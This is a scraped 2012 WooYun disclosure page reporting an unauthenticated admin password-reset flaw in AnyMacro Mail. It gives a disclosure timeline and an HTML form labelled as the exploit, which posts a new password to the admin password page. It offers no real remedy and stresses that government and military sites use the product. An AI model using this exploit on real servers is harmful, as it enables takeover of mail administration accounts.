AnyMacro Mail 重大漏洞 涉及政府、军工、收费运营商、大型企业
2012-06-19 09:00
344 查看
漏洞概要关注数(36) 关注此漏洞
缺陷编号:
WooYun-2012-06672
漏洞标题: AnyMacro Mail 重大漏洞 涉及政府、军工、收费运营商、大型企业
相关厂商:
AnyMacro Mail
漏洞作者:
松子
提交时间: 2012-05-04
公开时间: 2012-06-18
漏洞类型: 非授权访问/权限绕过
危害等级: 高
自评Rank: 20
漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org
Tags标签:
第三方不可信程序 敏感接口缺乏认证 敏感接口未加权限认证 AnyMacro-Mail
分享漏洞: 腾讯微博 新浪微博 Twitter 网易微博 豆瓣
漏洞详情
披露状态:
2012-05-04: 细节已通知厂商并且等待厂商处理中2012-05-07: 厂商已经确认,细节仅向厂商公开
2012-05-17: 细节向核心白帽子及相关领域专家公开
2012-05-27: 细节向普通白帽子公开
2012-06-06: 细节向实习白帽子公开
2012-06-21: 细节向公众公开
简要描述:
对于设置密码的页面存在漏洞可以直接修改原密码,本人技术很菜找不到路径拿不到shell用的地方还是挺多的。涉及政府、军工、收费运营商、大型企业怕和谐所以放出了。
详细说明:
漏洞证明:
EXP:<html> <head> <title> </title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <link rel="stylesheet" href="tpl/sysadm.css" type="text/css"> </head> <body class=bgcolor3> <br><br><br><br><br><br> <table width=260 cellspacing=0 cellpadding=0 align=center valign=middle> <tr height=11 class=bgcolor1> <td width=11><img src=tpl/image/topleft.gif></td> <td></td> <td width=11><img src=tpl/image/topright.gif></td> </tr> <tr align=center class=bgcolor1> <td width=11></td> <td class=font13><p class=font14><br><b>设置邮件系统管理密码</b></p> <form method=post action=网址/admin/password.php> 密 码: <input type=password name=password size=14><p> 重输密码: <input type=password name=password2 size=14><p> <input type=submit value="修改密码"> </form> </td> <td width=11></td> </tr> <tr height=11 class=bgcolor1> <td width=11><img src=tpl/image/bottomleft.gif></td> <td></td> <td width=11><img src=tpl/image/bottomright.gif></td> </tr> </table> <br><br><br><br><br><br><br> <table cellspacing=0 cellpadding=0 height=1 width=500 align=center><tr><td class=bgcolor1></td></tr> <tr><td align=center height=35 valign=bottom class=bgcolor3>Copyright © 2002 Beijing Anymacro Investment Ltd. All Rights Reserved.<br> 北京安宁投资有限公司 版权所有 </td></tr> </table> </body>
修复方案:
自己搞
版权声明:转载请注明来源 松子@乌云
相关文章推荐
- anymacro mail 严重漏洞
- 传运营商欲改革向OTT企业收费
- How to send mail using any email account through Foxmail ? - Foxmail 6 漏洞,如何通过 Foxmail 用任意邮件账号发送邮件?
- ccnp大型企业综合案例分析1
- 5月第3周安全回顾 思科路由器Rootkit现身 企业需漏洞管理
- 苹果iOS出现重大漏洞
- 精华【分布式微服务云架构dubbo+zookeeper+springmvc+mybatis+shiro+redis】分布式大型互联网企业架构!
- Exchange 2010 FAQ: Why Can’t I Manage Mailboxes in AD Users & Computers Any More?
- 大型企业网络配置系列课程详解(四) --HSRP和VRRP配置与相关概念的理解
- 每日区块链:区块链技术获得各国政府与顶级企业青睐;福布斯:招聘趋势——区块链技术和技术专家
- B2C免运费1年记:京东拖垮小企业后再收费
- 为上海莫大型重工企业提供基于TFS的软件研发流程管理培训
- Wi-Fi 爆重大安全漏洞,Android、iOS、Windows 等所有无线设备都不安全了
- 大型企业网络系统传输负载测试及分析
- QuarkMail get_att.cgi 命令执行漏洞
- OpenSSL曝重大安全漏洞
- 建站公司制作企业网站时动辄收费数万的原因
- 大型企业服务器的自动化运维(转载)